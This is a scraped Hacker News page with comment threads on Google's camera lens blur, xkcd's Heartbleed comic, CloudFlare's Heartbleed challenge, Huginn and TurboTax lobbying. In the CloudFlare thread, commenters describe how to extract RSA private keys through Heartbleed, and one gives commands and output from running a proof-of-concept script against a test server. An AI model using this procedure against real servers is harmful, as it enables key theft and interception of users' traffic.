2) Google Maps Photo Tours feature (available in areas where lots of touristy photos are taken). This does basically the same as the above but using crowdsourced images from the public.

IMO the latter is the most impressive depth-mapping feat I've seen: the source images are amateur photography from the general public, so they are randomly oriented (and without any gyroscope orientation data!), and uncalibrated for things like exposure, white balance, etc. Seems pretty amazing that Google have managed to make depth maps from that image set.

16
anigbrowl 1 day ago 0 replies      
It's interesting that the DoF is calculated in the app. I am wondering if this uses some known coefficients about smartphone cameras to save computation, but in any case I hope this depth mapping becomes available in plugin forms for Photoshop and other users.

As an indie filmmaker, it would save a lot of hassle to be able to shoot at infinity focus all the time and apply bokeh afterwards; of course an algorithmic version would likely never get close to what you can achieve with quality optics, but many situations where image quality is 'good enough' for artistic purposes (eg shooting with a video-capable DSLR) then faster is better.

17
jnevelson 1 day ago 1 reply      
So Google basically took what Lytro has been using hardware to achieve, and did it entirely in software. Pretty impressive.
18
frenchman_in_ny 1 day ago 2 replies      
Does this pretty much blow Lytro out of the water, and mean that you no longer need dedicated hardware to do this?
19
tdicola 23 hours ago 0 replies      
Neat effect--I'm definitely interested in trying this app. Would be cool to see them go further and try to turn highlights in the out of focus areas into nice octagons or other shapes caused by the the aperature blades in a real camera.
20
gamesurgeon 1 day ago 2 replies      
One of the greatest features is the ability to change your focus point AFTER you shoot. This is huge.
21
mauricesvay 1 day ago 0 replies      
The interesting part is not that it can blur a part of the image. The interesting part is that it can generate a depth map automatically from a series of images taken from different points of view, using techniques used in photogrammetry.
22
kingnight 1 day ago 1 reply      
I'd like to see an example of a evening/night shot using this. I can't imagine the results are anything like the examples here, but would love to be surprised.

Are there more samples somewhere?

23
spot 1 day ago 0 replies      
i just noticed i have the update and i tried it out.wow, first try. amazing:https://plus.google.com/+ScottDraves/posts/W4ozBLTBmKy
24
jestinjoy1 1 day ago 1 reply      
This is what i got with Moto G Google Camera Apphttp://i.imgur.com/a6AxO4e.jpg
25
goatslacker 1 day ago 0 replies      
On iOS you can customize your DoF with an app called Big Lens.

Normally apps like Instagram and Fotor let you pick one point in the picture or a vertical/horizontal segment and apply focus there while blurring the background. Big Lens is more advanced since it lets you draw with your finger what you'd like to be in focus.

They also include various apertures you can set (as low as f/1.8) as well as some filters -- although I personally find the filters to be overdone but others might find them tasteful.

26
bckrasnow 1 day ago 1 reply      
Well, the Lytro guys are screwed now. They're selling a $400 camera with this feature as the main selling point.
27
Lutin 1 day ago 0 replies      
This app is now on the Play Store and works with most phones and tablets running Android 4.4 KitKat. Unfortunately it seems to crash on my S3 running CM 11, but your experience may vary.

https://play.google.com/store/apps/details?id=com.google.and...

28
defdac 1 day ago 0 replies      
Is this related to the point cloud generation feature modern compositing programs use, like Nuke? Example/tutorial video: http://vimeo.com/61463556 skip to 10:27 for magic
29
insickness 1 day ago 1 reply      
> First, we pick out visual features in the scene and track them over time, across the series of images.

Does this mean it needs to take multiple shots for this to work?

30
Splendor 1 day ago 0 replies      
Isn't the real story here that Google is continuing to break off core pieces of AOSP and offer them directly via the Play Store?
31
zmmmmm 1 day ago 0 replies      
If nothing else, these improvements make HTC's gimmick of adding the extra lens while giving up OIS seem all the more silly.
32
mcescalante 1 day ago 3 replies      
I may be wrong because I don't know much about image based algorithms, but this seems to be a pretty successful new approach to achieving this effect. Are there any other existing "lens blur" or depth of field tricks that phone makers or apps are using?

I'd love to see their code open sourced.

33
marko1985 16 hours ago 0 replies      
Happy for this "invention" but I would wait for this kind of stuff when smartphones will have all their laser sensors for depth measurment, so this calculations doesn't require a sequnce of taken picture, as the main character could move quickly and deform the final picture or the blur effect. But for static photography or selfies looks amazing.
34
jheriko 1 day ago 0 replies      
This sounds clever but also massively complex for what it does. I don't have anything finished but I can think of a few approaches to this without needing to reconstruct 3d things with clever algorithms... still very neat visually if technically underwhelming
35
techaddict009 1 day ago 0 replies      
Just installed it. Frankly speaking I loved the new app!
36
anoncow 1 day ago 1 reply      
How is Nokia Refocus similar or different to this? It allows refocusing a part of the image which blurs out the rest.(Not a pro) https://refocus.nokia.com/
37
guardian5x 1 day ago 1 reply      
I guess that is exactly the same as Nokias Refocus that is on the Lumia Phones for quite some time: https://refocus.nokia.com/
38
the_cat_kittles 1 day ago 1 reply      
Isn't it interesting how, by diminishing the overall information content of the image by blurring it, it actually communicates more (in some ways, particularly depth) to the viewer?
39
CSDude 1 day ago 0 replies      
I wonder what is the exact reason that my country is not included. It is just a fricking camera app.
40
coin 1 day ago 0 replies      
Shallow depth of field is so overused these days. I much prefer having the entire frame in focus, and let me decides what to focus on. I understand the photographer is trying to emphasize certain parts of the photo, but in the end it feels too limiting. It's analogues to mobile "optimized" websites - just give me all the content and I'll choose what I want to look at.
41
ohwp 21 hours ago 0 replies      
Nice! Since they got a depth map, 3D-scanning can be a next step.
42
benmorris 1 day ago 0 replies      
The app is fast on my nexus 5. The lense blur feature is really neat. I've taken some pictures this evening and they have turned out great. Overall a nice improvement.
43
thomasfl 17 hours ago 0 replies      
I wish google camera gets ported to iOS. The best alternative for iOS seems to bee the "Big Lens" app, where you have to manually create a mask to specify the focused area.
44
sivanmz 1 day ago 0 replies      
It's a cool gimmick that would be useful for Instagram photos of food. But selfies will still be distorted when taken up close with a wide angle lens.

It would be interesting to pair this with Nokia's high megapixel crop-zoom.

45
dharma1 1 day ago 0 replies      
the accurate depth map creation from 2 photos on a mobile device is impressive. The rest has been done many times before

This is cool, but I am waiting more for RAW images exposed in Android camera API. Will be awesome to do some cutting edge tonemapping on 12bits of dynamic range that the sensor gives, which is currently lost.

46
bitJericho 1 day ago 0 replies      
If you couple this with instagram does it break the cosmological fabric?
47
spyder 1 day ago 0 replies      
But it can be used only on static subjects because it needs series of frames for depth.
48
servowire 1 day ago 3 replies      
I'm no photographer, but I was tought this was called bokeh not blur. Blur is more because of motion during open shutter.
49
matthiasb 1 day ago 0 replies      
I don't see this mode. I have a Note 3 from Verizon. Do you?
50
avaku 1 day ago 0 replies      
So glad I did the Coursera course on Probabilistic Graphical Models, so I totally have an understanding of how this is done when they mention Markov Random Field...
51
DanielBMarkham 1 day ago 0 replies      
Lately I've been watching various TV shows that are using green screen/composite effects. At times, I felt there was some kind of weird DOF thing going on that just didn't look right.

Now I know what that is. Computational DOF. Interesting.

Along these lines, wasn't there a camera technology that came out last year that allowed total focus/DOF changes post-image-capture? It looked awesome, but IIRC, the tech was going to be several years until released.

ADD: Here it is. Would love to see this in stereo 4K: http://en.wikipedia.org/wiki/Lytro The nice thing about this tech is that in stereo, you should be able to eliminate the eyeball-focus strain that drives users crazy.

52
apunic 23 hours ago 0 replies      
Game changer
53
alexnewman 1 day ago 0 replies      
Got me beat
54
seba_dos1 1 day ago 0 replies      
Looks exactly like "shallow" mode of BlessN900 app for Nokia N900 from few years ago.

It's funny to see how most of the "innovations" in mobile world presented today either by Apple or Google was already implemented on open or semi-open platforms like Openmoko or Maemo few years before. Most of them only as experiments, granted, but still shows what the community is capable of on its own when not putting unnecessary restrictions on it.

55
sib 1 day ago 2 replies      
If only they had not confused shallow depth of field with Bokeh (which is not the shallowness of the depth of field, but, rather, how out-of-focus areas are rendered), this writeup would have been much better.

http://en.wikipedia.org/wiki/Bokeh

Cool technology, though.

4
Xkcd: Heartbleed Explanation xkcd.com
528 points by MattBearman  6 days ago   75 comments top 12
1
billpg 6 days ago 2 replies      
I showed this to my wife to see if the cartoon worked with an educated but not-technical person. She subconsciously glossed over the (n LETTERS) part of Meg's requests as just an annotation on the cartoonist's part, not realizing that it was actually part of the request.

Once I rephrased the final request as "Server, reply with the 500 letters of HAT", we finally had that light-bulb moment.

2
nyellin 6 days ago 3 replies      
This is why xkcd is unique - not because of the puns or nerdy references, but because of Randall's ability to make complicated issues simple.
3
StavrosK 6 days ago 2 replies      
Nice easter egg in the user who wants to change the password to CoHoBaSt (correct-horse-battery-staple).
4
mixedbit 6 days ago 1 reply      
Security issue explained without Alice, Bob and Malory, this is way too confusing. Who is this Meg character?
5
AndrewDucker 6 days ago 6 replies      
Can someone explain why Heartbeat needed to return the text it was sent, rather than always returning an "OK" message?

What advantage does returning the text give you?

6
weavie 6 days ago 5 replies      
Wow. Was it really that simple? The heart beat request sends the text as well as the length it wants back?
7
damon_c 6 days ago 0 replies      
It's hard to believe that even with all of our slavish mantra repetition about not trusting user submitted data... the freaking web server trusts user submitted data.

We're all going to have to start reading more source code...

8
parax 6 days ago 0 replies      
"And this is, kids, why you always have to validate your input and do not trust on the user".
9
yiedyie 6 days ago 0 replies      
10
danyork 6 days ago 0 replies      
Brilliantly done! Great to have this out there to help explain the issue to non-developers.
11
spbhat1989 6 days ago 0 replies      
Xkcd is best at simplifying the most complex things and complicating the most simple things! :)
12
nashashmi 6 days ago 1 reply      
I just began appreciating all the hoops I jump through just to concentrate on things hardly anyone else cares about. It takes me nearly ten times as long to complete a program, and taxes my mind ten times more, and makes me frustrated twice as much about pursuing programming, but after a very sharp practicing curve, makes me hundred times better than the rest of the programmers out there. But, still, I wonder if it's worth it. Especially, considering my boring as hell job.
5
CloudFlare's Heartbleed challenge cracked twitter.com
523 points by jmduke  6 days ago   142 comments top 23
1
nikcub 6 days ago 4 replies      
Reading Cloudflare's blog post[0], they keep referring to the exploit having a length of 65,536 bytes, and how an allocation of that size is unlikely to find itself lower in the heap.

That is true - but this exploit doesn't depend on setting a length of 65,536. The server takes whatever length the client gives it (which is, afterall, the bug). Most of the early exploits just happen to set the maximum packet size to get as much data out (not realizing the nuances of heap allocation). You can set a length of 8bytes or 16bytes and get allocated in a very different part of the heap.

The metasploit module for this exploit[1] supports varied lengths. Beating this challenge could have been as simple as running it with short lengths repeatably and re-assembling the different parts of the key as you find it.

edit something that I want to sneak in here since I missed the other threads. Cloudflare keep talking about how they had the bug 12 days early. Security companies and vendors have worked together to fix bugs in private for years, but this is the first time i've ever seen a company brag about it or put a marketing spin on it. It isn't good - one simple reason why: other security companies will now have to compete with that, which forces companies not to co-operate on bugs (we had the bug 16 days early, no we had the bug 18 days early!, etc.).

As users you want vendors and security companies co-operating, not competing at that phase.

[0] Cloudflare - Can You Get Private SSL Keys Using Heartbleed? http://blog.cloudflare.com/answering-the-critical-question-c...

[1] see https://github.com/rapid7/metasploit-framework/blob/master/m...

2
tptacek 6 days ago 4 replies      
3
d0ne 6 days ago 1 reply      
We have reached out via twitter to this invidiual as to coordinate the delivery of the $10,000 bounty we offered. If anyone is already in contact with them please direct them to https://news.ycombinator.com/item?id=7572530
4
danielpal 6 days ago 2 replies      
The important thing to know here is that you not only have to change your current certs you ALSO HAVE TO REVOKE THE OLD ONE.

If you only change your current cert to get a new key but you don't go through the revocation process of the old certificate if someone managed to get the old one they can still use it for a MiTM attack - as both certs would be valid to any client.

5
ig1 5 days ago 1 reply      
So I didn't manage to crack the challenge (I used around 10k heartbeats), but I suspect it may have just been a case of brute-force (i.e asking for enough heartbleeds). Other people may have got the key without realizing that had done so because they were looking for the wrong thing (i.e. normal cert text representation).

I took the approach of using two fingerprints to search the data:

1) The hex sequence "30 82 .. .. 02 01 00" which would indicate the ASN.1 private key encoding which OpenSSL uses.

2) The modulus which I extracted from the public key (which would also be in the private key structure)

I didn't find any instance of the first, the second I found lots of instances of (because the modulus is also in the public key). I then filtered out all the instances of the public key by searching for the public key header ("30 82 .. .. 30 82").

This actually left me with two unique instances of the modulus in memory which weren't in a public key structure. I then tried to overlay the private key structure over the data and extracted what should have been the prime numbers and ran a primality test on them (to verify; another way would have been to just feed the structure into openssl). Both failed, so it wasn't the private key structure.

But there's a reasonable chance that those two instances represented a cryptographic calculation in progress; so while recovering the key wouldn't be as trivial as if you grabbed the full private key structure from memory (which I suspect is what the successful attackers did) I think it definitely represents another attack angle.

6
tomkwok 6 days ago 3 replies      
* From https://www.cloudflarechallenge.com/heartbleed *

So far, two people have independently solved the Heartbleed Challenge.

The first was submitted at 4:22:01PST by Fedor Indutny (@indutny). He sent at least 2.5 million requests over the span of the challenge, this was approximately 30% of all the requests we saw. The second was submitted at 5:12:19PST by Illkka Mattila using around 100 thousand requests.

We confirmed that both of these individuals have the private key and that it was obtained through Heartbleed exploits. We rebooted the server at 3:08PST, which may have contributed to the key being available in memory, but we cant be certain.

7
benmmurphy 5 days ago 3 replies      
i think cloudfare's version of nginx is a lucky version or my code is bugged or time after restart is important or you need to do some heap-fu by sending different payload sizes.

so i booted up a micro vm on amazon aws and was able to dump the private key in one request.

Ubuntu Server 13.10 (PV) - ami-35dbde5c

  sudo add-apt-repository ppa:nginx/development  sudo apt-get update  sudo apt-get install nginx  sudo apt-get install ssl-cert
modify /etc/nginx/sites-enabled/default uncomment ssl server and change certs:

  ssl_certificate /etc/ssl/certs/ssl-cert-snakeoil.pem;  ssl_certificate_key /etc/ssl/private/ssl-cert-snakeoil.key;  sudo /etc/init.d/nginx restart  curl -O https://gist.githubusercontent.com/benmmurphy/12999c91a4d328b749e3/raw/9bcd402e3d9beec740a61a1585e24c36dea80859/heartbeat.py  chmod u+x heartbeat.py  ubuntu@ip-10-185-20-243:~$ ./heartbeat.py localhost /etc/ssl/certs/ssl-cert-snakeoil.pem  Using modulus: C30FB990C6C1EE4EE4524A724BDF10DCDC735C9BCCED84B38796584DCE9F7CB1027CCF63A0E604882AE9B8639CD0955C207BE641943AE38AC4DAE63ECCE7E79ACE7EB9EB5D92F55761924C35A00EB5AE4759CB6DC938DBD48ED34685BC32B3193FEF55F081BB2BFC33494F26E556803FD2506F94301DFD688A63F9F3572C540F3F5E7679D5454E532503636ABFCB95AC5674D47C2B23C4418E04BE1D36AECF6BFEA81FC38FCA3E72A3EACD0BFD4E07FDC3BFA8E70E002ECA68FE8E0621F56081D90A3724A1BED6B5E3BDCDCC02B4EDEAFD0EC4D60C7DEC95BF7756CD82442915EE1AB6738F38B3BA932C8D27B34E94205C84AB64ACC34487ED2FF3804332AB63  Using key size: 128  Scanning localhost on port 443  Connecting...  Sending Client Hello...  Waiting for Server Hello...  Got length: 66   ... received message: type = 22, ver = 0302, length = 66  Message Type is 0x02  Got length: 750   ... received message: type = 22, ver = 0302, length = 750  Message Type is 0x0B  Got length: 331   ... received message: type = 22, ver = 0302, length = 331  Message Type is 0x0C  Got length: 4   ... received message: type = 22, ver = 0302, length = 4  Message Type is 0x0E  Server sent server hello done  Server TLS version was 1.2  Sending heartbeat request...  Got length: 16384   ... received message: type = 24, ver = 0302, length = 65551  Received heartbeat response:  Got result: 154948185083822336433702373602285084550034029190596792283600073258494868382158852796844241764405565518400264295279959791461705192749666707538790201985451035410116800023040704455951541838840288378897688943017357577574672157589664822948047455855119173651635078033464041188274590174256703712210173285385390714209  found prime: 0xdca74e63a186d60a9de3c8211e21a5b165c6d86d285c1d6eece2ad7a2505890ebae513e3013c3602f148e2112eaa99edd8ff5922494c4db47156727f93ab0f35a298553a82dfbd91e5e8aff2e969f31db31263bce9a89d95b64ff38ff5b86d47fa2e70aac5198d2ea967eb952f48b7264e824bd03b1c955294fb9caeed02ed61L
you can check the prime by doing:

  ubuntu@ip-10-185-20-243:~$ sudo openssl rsa -in /etc/ssl/private/ssl-cert-snakeoil.key -text  ..  prime1:      00:e2:4e:eb:f7:88:3a:d4:ad:61:2c:ef:6f:b2:a6:      3b:dd:c4:99:89:f1:b4:6e:6b:ce:76:51:c3:23:f7:      7a:37:69:f9:6c:eb:65:3d:cd:6a:f7:c9:97:96:b0:      f6:39:72:8a:ca:f7:45:3c:ff:25:b0:dd:a9:c1:08:      c3:aa:53:41:22:20:df:74:cb:1d:ad:ce:67:1d:11:      00:15:33:65:1f:d4:b9:a8:2b:27:50:da:7c:a7:e1:      88:d1:2c:d8:d9:32:07:ba:23:e1:40:fa:fa:94:46:      7f:9b:35:a1:d2:e4:91:86:f6:f3:79:2f:53:fd:95:      4d:99:56:b3:c0:be:97:6b:43  prime2:      00:dc:a7:4e:63:a1:86:d6:0a:9d:e3:c8:21:1e:21:      a5:b1:65:c6:d8:6d:28:5c:1d:6e:ec:e2:ad:7a:25:      05:89:0e:ba:e5:13:e3:01:3c:36:02:f1:48:e2:11:      2e:aa:99:ed:d8:ff:59:22:49:4c:4d:b4:71:56:72:      7f:93:ab:0f:35:a2:98:55:3a:82:df:bd:91:e5:e8:      af:f2:e9:69:f3:1d:b3:12:63:bc:e9:a8:9d:95:b6:      4f:f3:8f:f5:b8:6d:47:fa:2e:70:aa:c5:19:8d:2e:      a9:67:eb:95:2f:48:b7:26:4e:82:4b:d0:3b:1c:95:      52:94:fb:9c:ae:ed:02:ed:61  ..
so the exploit is the most stupid one possible. i took the POC code and changed it to read all 64k. The version i had was reading only 14kb from the server. Then just check all the 128 byte strings to see if they divide the modulus evenly.

8
guelo 6 days ago 2 replies      
"We rebooted the server at 3:08PST, which may have contributed to the key being available in memory, but we cant be certain.". https://www.cloudflarechallenge.com/heartbleed

That doesn't make sense to me, seems like the key needs to be in memory all the time, or at least during every session.

9
alexkus 5 days ago 0 replies      
Didn't have any spare time to have a go at this, here's how I was going to do it:-

1) Create a VM with the same version of Linux, nginx, openssl.

2) Create a self-signed SSL certificate for the server

3) Verify that the HTTPS server is vulnerable to heartbleed

4) Run a few HTTPS requests against the server

5) Use gcore (or just send SIGABRT) to get a core file of the nginx process

6) Write a tool to check the memory image for remnants of the private key (since I know what it looks like). This may be encoded in several forms: as is from the ssl key file, hex encoded modulus, binary encoded modulus, however the BigNum stuff in OpenSSL stores the modulus, intermediate values used in calculations, etc. I can also check for partial matches since I know what the full key looks like.

7) Run the heartbleed client against the site to extract some chunks of memory, there are various strategies for this:-

a) Repeatedly grab the largest (65535) bytes of memory each time

b) Repeatedly grab different sizes (8KB, 16KB, etc) depending on the bucket sizes for OpenSSL's freelist wrapper around malloc.

c) Vary the request size (lots more headers, etc) to try and get different chunks of memory returned.

d) Occasionally restart nginx

8) Once I can reliably (for whatever value of reliably that is) get the key from my own server, I then modify the test for success from a comparison against the known private key, to a test which involves decrypting a string that was the result of encrypting some known plaintext with the known public key. That'll be slower, but still possible.

9) Run that analysis against real data retreived from the challenge server. The data (using the various strategies in #7) can be obtained in the background whilst I'm developing #1-#8. You can't rely on having sole access to the server so whatever strategy you use may be perturbed by other people performing requests.

10) Repeat #1-#8 for Apache and any other web server that is vulnerable to heartbleed.

This does work on the assumption that the key (in whatever form it is in) will be returned as a contiguous block of memory. Trying to patch together chunks of memory to look for the key will be much much harder unless there's significant overlap and it's easy to detect what/where a key is somehow.

10
ademarre 6 days ago 4 replies      
https://twitter.com/eastdakota/status/454792635279220737

Pic of the CloudFlare team reviewing the attack. Ten guys crowded around one monitor.

11
aboodman 6 days ago 0 replies      
It probably took longer to compose that blog post than it took @indutny to disprove it.
12
nodesocket 6 days ago 1 reply      
Love to see a post on how it was done and the tools he used.
13
wrs 6 days ago 0 replies      
Well, so much for wishful thinking.
14
tszming 6 days ago 1 reply      
So @indutny sent at least 2.5 million requests, should we start to think more on the practical prevention techniques?
15
badusername 6 days ago 1 reply      
So this does mean that I need to change my passwords on every damn site on the list? Oh bollocks, those passwords were a work of art.
16
capcah 6 days ago 1 reply      
I am not sure how those guys did it, but I was talking to a friend of mine today, and I guess that it had something to do with forcing the server to use its private key to check for information sent to it. Then you use the heartbleed bug to intercept the intermediate forms on the information you sent to be decrypted/authenticated. Since you know the plaintext, the ciphertext and the intermediate forms, it should be possible to recover the key.

As I said, I am not sure that is right or if that was the method used to exploit cloudflare, as I didn't had the time nor the knowledge of openssl implementation to test it out, I am just throwing my guess out there before the official exploit comes about.

edit: formatting

17
specto 6 days ago 1 reply      
Considering he just pulled a shadow file as well, it's not pretty.
18
tectonic 6 days ago 2 replies      
Ah crap.
19
athoik 5 days ago 0 replies      
An error occurred during a connection to www.cloudflarechallenge.com. Peer's Certificate has been revoked. (Error code: sec_error_revoked_certificate)

Game over...

20
dogsky 5 days ago 0 replies      
I was unable to replicate. Can someone give more details, maybe the heartbleed script updated and some instructions to replicate it? Thanks.
21
diakritikal 6 days ago 0 replies      
Hubris is ugly.
22
yp_maplist 6 days ago 0 replies      
IMO, CloudFlare is lame. Kudos to this guy for reminding me just how much so.
23
bitsteak 6 days ago 1 reply      
Why did anyone need this challenge in the first place? Couldn't someone have justed ASKED a good exploit developer what they would do and what the impact is? No, I guess we're all up for wasting people's time and creating potential false negatives.
6
Huginn: Like Yahoo Pipes plus IFTTT on your server github.com
484 points by ColinWright  3 days ago   94 comments top 23
1
malanj 3 days ago 2 replies      
This looks really awesome for managing an office. We're currently automating things using Google scripts and other custom glue to do things like order food, get feedback on lunch and mail people weekly digests activities. Sounds like this could be a great solution for this.
2
albertsun 3 days ago 2 replies      
The best part of Huginn is being able to self-host and write any arbitrary agents you want.
3
hyp0 3 days ago 1 reply      
I always liked the Yahoo Pipes concept... but it didn' seem take off... and I personally found it too limited for everything I tried to do with it. Perhaps it's just another case of the old "visual programming language" is harder than it looks.

I hope Huginn does better. I like their copywriting "You always know who has your data. You do."

4
danso 3 days ago 0 replies      
Also relevant: How the New York Times interactive team uses Huginn

https://source.opennews.org/en-US/articles/open-source-bot-f...

> Most prominently, we used it during our Olympics coverage to monitor the results of the API we built and let us know if the data ingestion pipeline ever grew stale. To do that, we set up a pipeline

5
yukichan 3 days ago 0 replies      
Zapier is also good with lots of integrations, but it's a little pricey. Yet if you calculate what your time is worth and include the amount spent on making this work plus customizations, it's probably less. Depends on if Zapier can do what you want.
6
c0nsumer 3 days ago 1 reply      
This is a really frustrating name. Hugin is already used for panoramic photo stitching software: http://hugin.sourceforge.net/

This just has another N bolted on to the end and does something completely different.

7
fasteddie31003 3 days ago 3 replies      
I am working on a similar project called Taskflow.io that is aimed at more backend business oriented tasks. It can do similar things through an interface flowchart editors where you make the actual flowchart that gets executed. I would still consider it a public beta. I would love your feedback.
8
FroshKiller 3 days ago 1 reply      
One of the developers posted about this recently: https://news.ycombinator.com/item?id=7582316
9
thomasfl 3 days ago 1 reply      
Will this run on a standard heroku stack? The wiki says it will run on OpenShift and CloudFoundry. https://github.com/cantino/huginn/wiki
10
alxndr 2 days ago 1 reply      
Anyone know why this project encourages using a private fork to do contributing development?

> "Make a public fork of Huginn. [...] Make a private, empty GitHub repository called huginn-private. Duplicate your public fork into your new private repository[. ...] Checkout your new private repository. Add your Huginn public fork as a remote to your new private repository[. ...] When you want to contribute patches, do a remote push from your private repository to your public fork of the relevant commits, then make a pull request to this repository."

11
kzahel 3 days ago 4 replies      
Does this have a companion android/iOS app to upload location data?I really like the idea of self hosting something like this.
12
jayxie 3 days ago 0 replies      
Exciting stuff, it would be amazing to build an AI layer on top of this that mines your browsing habits (depending on your paranoia settings) and automatically generates agents based on your interests.
13
platz 3 days ago 3 replies      
Excluding the UI, I wonder if storm is a more robust, if more complex, option to do the same types of things: http://storm.incubator.apache.org/
14
weavie 3 days ago 0 replies      
This sounds like an excellent project to make use of my raspberry pi.
15
rcyeager 3 days ago 1 reply      
Another Pipes+IFTTT tool: https://wewiredweb.com
16
okhan 2 days ago 0 replies      
I was just building exactly this, only worse. Looks really great.
17
zwentz 3 days ago 0 replies      
This would be very cool for automating parts of AWS. Inclement weather coming? Or an earthquake? Start spooling up servers in another region.
18
SloughFeg 3 days ago 1 reply      
Is there an online sandbox anywhere to check it out? A project like this simply calls out for their to be a live demo.
19
kirk21 3 days ago 1 reply      
Where can you get an invite code? http://snag.gy/xh6uk.jpg
20
fujipadam 1 day ago 0 replies      
This is awesome but is there a tool like this in php? I am looking for a easy visual scraper
21
notastartup 3 days ago 1 reply      
what would be great is if each agent was somehow able to obtain it's own ip address.
22
psaintla 3 days ago 2 replies      
Am I missing something or is this just another rules engine?
23
dfc 3 days ago 1 reply      
You are doing it wrong. Colin's style is more like this:

  Previous discussion of the project:  https://news.ycombinator.com/item?id=7582316 # Yesterday  https://news.ycombinator.com/item?id=5377651

7
TurboTax Maker Intuit Funnels Millions to Lobby Against Easier Tax Returns techcrunch.com
443 points by acjohnson55  2 days ago   180 comments top 42
1
bpeebles 2 days ago 4 replies      
Virginia's Department of Taxation used to have a pretty decent online tax website. It was shutdown because of lobbying such as this. There was a year when no free online filing so I took the extra effort to do a paper return that year. Even FreeFilableForms are run by the Free File Alliance which is part of the group that lobbies against the IRS and state taxation departments from doing their own filing websites for personal profit. So they make sure that their own free filing options are just good enough to be barely acceptable while making their paid (for filers with income over ~$58k) options seem much more attractive.

Between this and intentional complexity of the tax system that hinders making the IRS more efficient and hides true tax rates that corporations and higher income people... I dunno, it's one of the blacker marks against America in this aspect of policy.

But I've without doubt decide I'll try as hard as possible to never, ever pay a company like that to file tax returns.

2
eli 2 days ago 1 reply      
This TechCrunch post is a rehash of last year's ProPublica investigation: http://www.propublica.org/article/how-the-maker-of-turbotax-...

Might as well at least mention this year's revelation, which is that they fund fake Grassroots campaigns against tax reform: http://www.propublica.org/article/turbotax-maker-linked-to-g...

3
nixy 1 day ago 5 replies      
I lived in the US last year and just finished my taxes. It was unbelievably complicated and confusingeven using Turbo Tax. Never seen the likes of it.

This is how I do my tax return in Sweden:

1. Receive equivalent of W2, but all returns are already pre-calculated since the Swedish IRS knows all it needs to know to be able to prepare my returns.

2. If I'm happy with my W2 and pre-calculated returns, I simply send a text message with a PIN code to submit my returns.

3. If I'm not happy with my pre-calculated returns, I make the necessary changes in a simple form and mail it back to the IRS. Most people never do this.

4
bbanyc 2 days ago 2 replies      
Many foreigners are puzzled about why we Americans complain so much about our taxes, when they aren't particularly high by global standards. A major reason is that our taxes are particularly intrusive and annoying by global standards.

This also goes for consumption taxes - a 9% sales tax added at the register feels more intrusive than a 20% VAT included in the price tag, even though the VAT is much higher.

5
ryanobjc 2 days ago 4 replies      
It's really too bad, their basic product - turbo tax free file uses the 1040 EZ form and can be confusing.

My gf who is a student was told by turbotax she owed over $300, after doing it on paper, the old fashioned way, the tax liability was 0. Why? The tuition deduction didn't apply on the EZ version of the form.

Ultimately turbo tax takes a conservative, strict and rigid approach to taxes, but as anyone knows this isn't the reality of doing taxes. For anyone with a moderately complex return, I think it's better to hire a tax professional, then at least you'll LEARN something for your money (which can be about the same amount!).

6
SeanKilleen 2 days ago 5 replies      
This is probably better left for "Idea Sunday", but I keep coming back to the fact that:

* We have languages for defining business processes & workflows (e.g. BPMN/BPML);

* We have open-source workflow engines (such as Activiti in Java and others all over the language spectrum) that utilize BPMN and terms;

* We have open-source ways of maintaining changes to these things over time.

I know it would be a monumental task, but why not start an open-source org to tackle Tax visibility at Federal and State levels?

With enough civic-minded hackers and accountants (both of which I believe exist), we could begin the process of transcribing the tax code into an interchange format. Then as we begin to see the updates each year, we can track the changes via source control.

Does anybody know if efforts like this have been undertaken anywhere else? Otherwise, I may have found my passion project.

Furthermore, does anyone know anything about the process by which Intuit makes this happen? They clearly have workflows and inputs into them; they had to get there somehow. I'd be interested in any/all knowledge that could be opened up on this.

7
brianstorms 1 day ago 2 replies      
This should not come as any surprise, really. This is what mature companies do once they achieve any level of monopoly that could be threatened with new legislation that benefits the public (and other businesses) but could hurt the monopoly. This is what the auto dealers are doing: after enjoying decades of control and a cozy relationship with legislators, they're threatened by upstarts like Tesla. But then at some point, if and when Tesla wins, it'll have to deploy its own army of lobbyists to keep the new status quo going.

It is what every web and mobile startup, it seems to me, deep down aims for: a monopoly, an unfair advantage. It is what, between the lines, you are taught at YC and what every VC expects of the "unicorn" portfolio companies that strike it rich. Fight to get to #1, wipe out the competition, reap the winnings, and, oh yeah, strike down any threats from, you know, up-and-coming competitors. So it goes.

It's business. It's ugly. If you don't like it, why are you doing a startup? If your startup is wildly successful and IPO's and turns into a giant, you don't think you will have to pay a lot of lobbyists to control the legislators?

8
japhyr 1 day ago 1 reply      
I don't mind paying taxes. But I was definitely cursing this last week as I spent hours filling out forms to calculate numbers that the IRS has already calculated on its own.

I want a letter in the mail saying, "If you don't fill out any paperwork, this is the amount we will return to you/ bill you for. If you get a different number, send in your paperwork by 4/15."

Doing taxes is a ridiculous waste of most people's time.

9
Oculus 2 days ago 1 reply      
This makes me wonder how much of the government's incompetence is from companies lobbying for the government to keep its old ways.
10
CoachRufus87 2 days ago 0 replies      
Bigger story: our government can be bought for the low price of $11.5 million.
11
cpwright 1 day ago 0 replies      
The current software is also just bad. I used to use TurboTax, but now I'm using TaxCut. TaxCut has the following issues, which are really just stupid at this point:- Even though it could import last years return, it needs me to tell it how much of my 2012 tax refund from the state should be counted as 2013 income. I have to recalculate my last year's tax liability based on a lower deduction (because AMT may or may not erase the deduction anyway).- It tells you that you have a slightly increased audit risk for one of about 5 different reasons, that are mutually exclusive and only one of them applies to my return.

This is the stuff that a computer can do very well, but is tedious and error-prone for me.

Moreover, the last time I used TurboTax and I'm sure this is true with TaxCut still, it wants me to decide if I want to file jointly or separately. Why in the world should I have to make that decision or do the returns twice. The software should be intelligent enough to do the calculations both ways, and present the better answer, with the option to overrule it.

If the government was making this software you could see it being this bad, but these companies are supposedly competing to do it; but it is still awful. Arguably, this is because the tax system is awful, but most of this is just coasting.

I also would expect that the state software wouldn't be very good (at least for unpopulous states), but most of my issues are with the federal return.

12
clogston 2 days ago 6 replies      
Disclaimer: I used to work for Intuit/TurboTax and am now building a product in the same space. On topic: They rightly get beat up for this, and get beat up for their lack of pricing transparency, but somehow manage to always receive a pass on the software itself. IMHO it's pretty atrocious... Sure, the math is almost always right but the math is a commodity. The experience itself is overly-verbose and littered with repeat questions, confusing questions, open-ended questions.

I don't know anyone who genuinely enjoys using TurboTax. I'm surprised there isn't more legitimate competition in this space.

13
onislandtime 2 days ago 1 reply      
